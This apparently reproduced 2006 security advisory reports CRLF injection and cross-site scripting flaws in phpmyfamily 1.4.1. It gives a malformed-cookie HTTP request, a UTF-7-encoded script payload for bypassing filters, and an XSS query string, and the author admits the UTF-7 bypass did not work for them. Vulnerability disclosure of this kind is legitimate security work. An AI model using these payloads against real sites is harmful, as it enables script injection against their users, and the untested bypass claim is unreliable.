phpmyfamily 1.4.1 CRLF injection & XSS

Credit: matrix_killer
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

------------------------------------------------------ HYSA-2006-007 Advisory 016 ------------------------------------------------------ Date - Mon March 27 2006 TITLE: ====== phpmyfamily v1.4.1 CRLF injection & XSS SEVERITY: ========= Medium SOFTWARE: ========= phpmyfamily v1.4.1 INFO: ===== phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central database of research which is readily accessable and editable. DESCRIPTION: ============ --== CRLF Injection ==-- GET /phpmyfamily/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) Host: Cookie: PHPSESSID=-4-2-=674sdasaf_ Connection: Close Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in on line 88 You can try to encode <script>alert('matrix_killer');</script> in Utf-7 like this: +ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer'); +ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- This way you can bypass the protection, but I'm not sure that it will work. For me it didn't but I'm still a beginner with the crlf attacks. --== XSS ==--'><script>alert ();</script>&email=1&action=sub&submit=Wy%B6lij VENDOR STATUS: ============== Vendor was contacted but no response received till date. CREDITS: ======== This vulnerability was discovered and researched by matrix_killer of h4cky0u Security Forums. mail : matrix_k at web : Co-Researcher: h4cky0u of h4cky0u Security Forums. mail : h4cky0u at web : Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!! ORIGINAL ADVISORY: ==================

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top